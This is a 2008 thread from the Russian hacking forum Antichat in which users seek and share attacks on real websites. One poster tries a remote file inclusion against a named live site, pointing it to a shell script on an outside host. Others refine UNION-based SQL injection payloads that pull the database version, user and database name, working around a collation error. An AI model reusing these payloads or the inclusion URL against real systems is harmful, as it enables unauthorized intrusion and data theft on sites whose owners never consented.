ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3301  
Старый 19.09.2008, 16:02
br3k
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788

Репутация: 327
Отправить сообщение для br3k с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Продскажите плиз! PhpBB 3.0.1! Какие у него есть уязвимости?
http://www.milw0rm.com/exploits/3370
 
Ответить с цитированием

  #3302  
Старый 19.09.2008, 17:41
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
По умолчанию

Посмотрел! И почему не работает??

http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php

Я же правельно всё зделала?
 
Ответить с цитированием

  #3303  
Старый 19.09.2008, 20:14
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

при запросе -1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* выдает ошибку Query failed : Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION' как так?)) union же команда ее разве нада кодировать?)
 
Ответить с цитированием

  #3304  
Старый 19.09.2008, 20:16
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

j0ker13

-1+union+select+convert(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*

вот так должно прокатить )

Последний раз редактировалось ~!DoK_tOR!~; 19.09.2008 в 20:18..
 
Ответить с цитированием

  #3305  
Старый 19.09.2008, 20:23
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Посмотрел! И почему не работает??

http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php

Я же правельно всё зделала?
значит пропатчен )

на дату бага посмотри 2007-02-24
 
Ответить с цитированием

  #3306  
Старый 19.09.2008, 20:27
Дюша
Banned
Регистрация: 09.12.2007
Сообщений: 301
Провел на форуме:
1796349

Репутация: 174
По умолчанию

http://www.vkavkaz.tu2.ru/
чеза говнофейк

Регистрация:
Внимание перед регистрацией вам надо авторезироваться:
В целях безопасности ваших данных, для успешного авторезирования на нашем сайте, вам нужно вести E-MAIL почтового ящика, и его пароль!
 
Ответить с цитированием

  #3307  
Старый 19.09.2008, 20:34
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

2~!DoK_tOR!~ неа)) convert может тока один столбик кодировать или можна сделать так -1+union+select+convert(1,2,3,4,5,6,7+using+latin1)/* или нада каждый конвертировать?))
 
Ответить с цитированием

  #3308  
Старый 19.09.2008, 20:38
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

j0ker13

линк дай
 
Ответить с цитированием

  #3309  
Старый 19.09.2008, 20:44
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

=) ушло тебе)
 
Ответить с цитированием

  #3310  
Старый 19.09.2008, 21:16
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от ~!DoK_tOR!~  
j0ker13

-1+union+select+convert(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*

вот так должно прокатить )
Я только не пойму, если ошибка:
Цитата:
(utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE)
Зачем конвертировать в latin1 ?

j0ker13

Вот так будет работать:
convert(concat_ws(0x3a,User(),Database(),Version() )+using+cp1251)

если вам нравится с конверт заморачиваться, а вообще

UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version ())))

универсально

Последний раз редактировалось jokester; 19.09.2008 в 21:31.. Причина: скобка лишняя ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ